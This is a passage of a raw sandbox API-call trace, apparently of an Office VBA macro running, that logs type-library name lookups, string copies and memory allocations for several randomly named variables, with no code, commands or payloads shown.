lHashVal=0x105bb0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.035] IUnknown:Release (This=0x665ba50) returned 0xf [0070.035] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0070.035] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="OAAAUAB", lHashVal=0x105bb0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.035] IUnknown:Release (This=0x631b4c0) returned 0xb [0070.035] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0070.035] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="OAAAUAB", lHashVal=0x105bb0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.035] IUnknown:Release (This=0x665bd20) returned 0x6 [0070.035] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0070.035] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="OAAAUAB", lHashVal=0x105bb0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.035] IUnknown:Release (This=0x665b4b0) returned 0x4 [0070.035] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2886, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="OAAAUAB") returned 8 [0070.035] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="OAAAUAB", lHashVal=0x105bb0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.035] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d20 [0070.035] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x8, _Src=0x3cb2886 | out: _Dst=0x67c2d20) returned 0x0 [0070.035] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_OAAAUAB") returned 0x105f34 [0070.035] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_OAAAUAB" | out: _Dst="_B_var_OAAAUAB") returned 0x0 [0070.035] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_OAAAUAB") returned 15 [0070.035] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.035] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_OAAAUAB", lHashVal=0x105f34, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.035] IUnknown:Release (This=0x665ba50) returned 0xf [0070.035] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0070.035] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_OAAAUAB", lHashVal=0x105f34, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.035] IUnknown:Release (This=0x631b4c0) returned 0xb [0070.035] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0070.035] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_OAAAUAB", lHashVal=0x105f34, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.035] IUnknown:Release (This=0x665bd20) returned 0x6 [0070.035] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0070.035] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_OAAAUAB", lHashVal=0x105f34, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.036] IUnknown:Release (This=0x665b4b0) returned 0x4 [0070.036] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.036] IUnknown:Release (This=0x665ba50) returned 0xf [0070.036] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa9d1dbe, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_OAAAUAB") returned 15 [0070.036] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_OAAAUAB", lHashVal=0x105f34, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4f005f00720061, ppTypeComp=0x55004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4f005f00720061, ppTypeComp=0x55004100000000, pDummy=0x0) returned 0x0 [0070.036] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3cb2886 | out: _Dst=0x144ec0) returned 0x0 [0070.036] ITypeComp:RemoteBind (in: This=0x665ba60, szName="uA_DcU", lHashVal=0x1056d1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.036] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb28ae, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="uA_DcU") returned 7 [0070.036] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="uA_DcU", lHashVal=0x1056d1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.036] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb28ae, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="uA_DcU") returned 7 [0070.036] ITypeComp:RemoteBind (in: This=0x665bd30, szName="uA_DcU", lHashVal=0x1056d1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.036] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="uA_DcU") returned 0x1056d1 [0070.036] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="uA_DcU" | out: _Dst="uA_DcU") returned 0x0 [0070.036] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="uA_DcU") returned 7 [0070.036] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.036] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="uA_DcU", lHashVal=0x1056d1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.036] IUnknown:Release (This=0x665ba50) returned 0xf [0070.036] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0070.036] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="uA_DcU", lHashVal=0x1056d1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.036] IUnknown:Release (This=0x631b4c0) returned 0xb [0070.036] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0070.037] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="uA_DcU", lHashVal=0x1056d1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.037] IUnknown:Release (This=0x665bd20) returned 0x6 [0070.037] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0070.037] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="uA_DcU", lHashVal=0x1056d1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.037] IUnknown:Release (This=0x665b4b0) returned 0x4 [0070.037] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb28ae, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="uA_DcU") returned 7 [0070.037] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="uA_DcU", lHashVal=0x1056d1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.037] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d20 [0070.037] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x7, _Src=0x3cb28ae | out: _Dst=0x67c2d20) returned 0x0 [0070.037] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_uA_DcU") returned 0x10d17a [0070.037] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_uA_DcU" | out: _Dst="_B_var_uA_DcU") returned 0x0 [0070.037] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_uA_DcU") returned 14 [0070.037] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.037] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_uA_DcU", lHashVal=0x10d17a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.037] IUnknown:Release (This=0x665ba50) returned 0xf [0070.037] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0070.037] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_uA_DcU", lHashVal=0x10d17a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.037] IUnknown:Release (This=0x631b4c0) returned 0xb [0070.037] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0070.037] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_uA_DcU", lHashVal=0x10d17a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.037] IUnknown:Release (This=0x665bd20) returned 0x6 [0070.037] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0070.037] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_uA_DcU", lHashVal=0x10d17a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.037] IUnknown:Release (This=0x665b4b0) returned 0x4 [0070.037] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.037] IUnknown:Release (This=0x665ba50) returned 0xf [0070.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa9d1dee, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_uA_DcU") returned 14 [0070.038] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_uA_DcU", lHashVal=0x10d17a, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x75005f00720061, ppTypeComp=0x63004400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x75005f00720061, ppTypeComp=0x63004400000000, pDummy=0x0) returned 0x0 [0070.038] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3cb28ae | out: _Dst=0x144ec0) returned 0x0 [0070.038] ITypeComp:RemoteBind (in: This=0x665ba60, szName="lAcD1AcQ", lHashVal=0x10051b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb28d6, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="lAcD1AcQ") returned 9 [0070.038] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="lAcD1AcQ", lHashVal=0x10051b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb28d6, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="lAcD1AcQ") returned 9 [0070.038] ITypeComp:RemoteBind (in: This=0x665bd30, szName="lAcD1AcQ", lHashVal=0x10051b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.038] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lAcD1AcQ") returned 0x10051b [0070.038] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="lAcD1AcQ" | out: _Dst="lAcD1AcQ") returned 0x0 [0070.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="lAcD1AcQ") returned 9 [0070.038] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.038] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="lAcD1AcQ", lHashVal=0x10051b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.038] IUnknown:Release (This=0x665ba50) returned 0xf [0070.038] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0070.038] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="lAcD1AcQ", lHashVal=0x10051b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.038] IUnknown:Release (This=0x631b4c0) returned 0xb [0070.038] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0070.038] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="lAcD1AcQ", lHashVal=0x10051b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.039] IUnknown:Release (This=0x665bd20) returned 0x6 [0070.039] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0070.039] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="lAcD1AcQ", lHashVal=0x10051b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.039] IUnknown:Release (This=0x665b4b0) returned 0x4 [0070.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb28d6, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="lAcD1AcQ") returned 9 [0070.039] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="lAcD1AcQ", lHashVal=0x10051b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.039] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d20 [0070.039] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x9, _Src=0x3cb28d6 | out: _Dst=0x67c2d20) returned 0x0 [0070.039] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_lAcD1AcQ") returned 0x10dce3 [0070.039] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_lAcD1AcQ" | out: _Dst="_B_var_lAcD1AcQ") returned 0x0 [0070.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_lAcD1AcQ") returned 16 [0070.039] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.039] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_lAcD1AcQ", lHashVal=0x10dce3, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.039] IUnknown:Release (This=0x665ba50) returned 0xf [0070.039] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0070.039] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_lAcD1AcQ", lHashVal=0x10dce3, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.039] IUnknown:Release (This=0x631b4c0) returned 0xb [0070.039] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0070.039] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_lAcD1AcQ", lHashVal=0x10dce3, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.039] IUnknown:Release (This=0x665bd20) returned 0x6 [0070.039] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0070.039] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_lAcD1AcQ", lHashVal=0x10dce3, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.039] IUnknown:Release (This=0x665b4b0) returned 0x4 [0070.039] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.039] IUnknown:Release (This=0x665ba50) returned 0xf [0070.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa9d1e1e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_lAcD1AcQ") returned 16 [0070.039] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_lAcD1AcQ", lHashVal=0x10dce3, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6c005f00720061, ppTypeComp=0x31004400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6c005f00720061, ppTypeComp=0x31004400000000, pDummy=0x0) returned 0x0 [0070.040] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3cb28d6 | out: _Dst=0x144ec0) returned 0x0 [0070.040] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x67c2d20) returned 0x0 [0070.040] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Hex") returned 0x1055b0 [0070.040] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.040] IUnknown:Release (This=0x665ba50) returned 0xf [0070.040] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0070.040] IUnknown:Release (This=0xaf0b528) returned 0x4 [0070.040] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0070.040] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0070.040] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d20) [0070.040] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0070.040] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0070.040] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0070.040] IUnknown:Release (This=0x665ba50) returned 0xf [0070.040] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0070.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0070.040] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0070.040] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0070.040] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d20 [0070.040] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d20) returned 0x0 [0070.040] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0070.041] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.041] IUnknown:Release (This=0x665ba50) returned 0xf [0070.041] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0070.041] IUnknown:Release (This=0xaf0b528) returned 0x4 [0070.041] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0070.041] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0070.041] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d20) [0070.041] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0070.041] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0070.041] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0070.041] IUnknown:Release (This=0x665ba50) returned 0xf [0070.041] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0070.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0070.041] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0070.041] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0070.041] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d20 [0070.041] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d20) returned 0x0 [0070.041] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0070.041] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.041] IUnknown:Release (This=0x665ba50) returned 0xf [0070.041] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0070.041] IUnknown:Release (This=0xaf0b528) returned 0x4 [0070.041] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0070.041] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0070.041] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d20) [0070.041] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0070.042] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0070.042] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0070.042] IUnknown:Release (This=0x665ba50) returned 0xf [0070.042] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, 